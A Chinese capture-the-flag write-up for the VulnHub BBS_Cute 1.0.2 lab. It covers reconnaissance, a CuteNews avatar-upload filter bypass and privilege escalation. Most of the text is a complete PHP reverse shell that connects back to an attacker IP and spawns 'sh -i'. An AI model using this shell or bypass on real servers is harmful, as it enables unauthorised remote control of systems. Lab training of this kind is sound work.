"各自乘流而上、互为欢喜人间,万里星光,一如既往"
项目地址:
https://www.vulnhub.com/entry/bbs-cute-102,567/
对目标主机进行探测
sudo nmap -sP 192.168.33.1/24
IP:192.168.33.142
端口服务探测
sudo nmap -sC -sV 192.168.33.142 -oN BBS_CUTE.nmap
对开放的80、88端口进行目录扫描
sudo gobuster dir -u http://192.168.33.142 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium
http://192.168.33.142/index.php 发现入口
注册页面的验证码无法显示,需要自行访问下面的地址获取
CMS 是 CuteNews 2.1.2,去 exploit-db 看下,
有一个 RCE 漏洞,下 POC 来用一下
修改一下 payload,运行
python3 48800.py http://192.168.33.142/index.php
利用失败
有个上传头像的地方,看下能不能上传 shell
经过测试,不以图片文件头开头的 shell 会被过滤;反弹 shell payload 如下:
GIF89; <?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.
// Copyright (C) 2007 [email protected]
//
// NOTE(review): this listing was pasted as a single collapsed line; it is re-broken onto
// lines here with no token changed. "$stringn" and the trailing "? |" are left exactly as pasted.
//
// Defender notes on what this file demonstrates (all visible below):
//  - The bytes before "<?php" are the image-header prefix the writeup says the avatar upload
//    checks for; PHP emits them as literal output and still runs the code that follows, so a
//    magic-byte check alone does not validate an upload. Mitigation: enforce an extension
//    allowlist, and store uploads outside the web root or with script execution disabled.
//  - Host indicators: the web-server process opening an outbound TCP connection (fsockopen),
//    then spawning an interactive shell via proc_open with "sh -i", optionally detaching
//    with pcntl_fork/posix_setsid.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.33.150';$port = 4444;   // attacker-side listener; see "nc -lvvp 4444" below
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';     // command line handed to proc_open
$daemon = 0;
$debug = 0;
// Detach from the PHP worker when the pcntl extension is present; parent exits, child continues.
if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0); // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}
// Non-blocking on all four streams so the select loop below never stalls on one side.
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
// Relay loop: socket -> child stdin; child stdout/stderr -> socket. Ends when either side closes.
while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");break;
    }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Declared after first use; PHP hoists unconditional top-level function declarations.
// NOTE: $daemon here is function-local (no "global $daemon"), so it is always unset and
// the message is always printed into the HTTP response.
function printit ($string) {
    if (!$daemon) {
        print "$stringn";
    }
}
? |
上传成功,攻击机监听
nc -lvvp 4444
访问
http://192.168.33.142/uploads/avatar_test2_revshell_pitcure.php
反弹成功:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl+z
stty -a #57 116
stty raw -echo;fg
reset
stty rows x columns y
提权:
/usr/sbin/hping3
原文始发于微信公众号(0x00实验室):VulnHub靶机 | BBS_Cute:1.0.2 上传绕过